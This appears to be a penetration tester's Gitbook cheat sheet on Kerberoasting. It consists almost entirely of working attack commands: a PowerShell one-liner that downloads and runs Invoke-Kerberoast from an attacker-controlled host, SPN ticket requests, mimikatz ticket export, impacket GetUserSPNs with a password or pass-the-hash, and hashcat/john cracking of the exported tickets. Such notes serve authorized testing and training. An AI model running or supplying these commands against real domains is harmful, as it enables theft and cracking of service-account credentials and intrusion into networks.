All Gitbook

Ticket manipulations mimi

LogoEmpire/data/module_source/credentials at master · EmpireProject/EmpireGitHub
invoke-kerberoast.ps1 automatically enumerate all service principal names in the domain, request service tickets for them, and export them in a format ready for cracking in both John the Ripper and Hashcat
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/invoke-kerberoast.ps1'); Invoke-Kerberoast -Domain 'domain.com' | fl"

Import-Module .\invoke-kerberoast.ps1 (or . .\invoke-kerberoast.ps1)
Invoke-Kerberoast -Domain 'domain.com' | fl
(-Server 'dc01.domain.com')

#with creds
$SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('doamin\user.x', $SecPassword)
Invoke-Kerberoast -Credential $Cred -Verbose | fl
LogoInvoke-Kerberoast - PowerSploit

Request ticket

SPN e.g. MSSQLSvc/xor-app23.xor.com:1433 HTTP/CorpWebServer.corp.com

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '{SPN}' 

klist
or
sekurlsa::tickets

Dump .kirbi for kerberoast (no need admin)

.\mimikatz.exe "kerberos::list /export" "exit"

use scp to transfer / nc binary / smb

With domain user pwd / hash, dump for kerberoash from kali


proxychains impacket-GetUserSPNs domain.local/user:"pwd" -dc-ip 10.10.10.10 -request

proxychains impacket-GetUserSPNs domain.local/user -hashes lm:nt -dc-ip 10.10.10.10 -request

kerberoast to crack service ticket cleartext pwd

kirbi2john exported.kirbi > johnkirbi.txt

hashcat -m 13100 --force johnkirbi.txt /usr/share/wordlists/rockyou.txt
john /usr/share/wordlists/rockyou.txt johnkirbi.txt --format=krb5tgs
tgsrepcrack /usr/share/wordlists/rockyou.txt xxxx.kirbi
PreviousFlowNextSilver / Golden

Last updated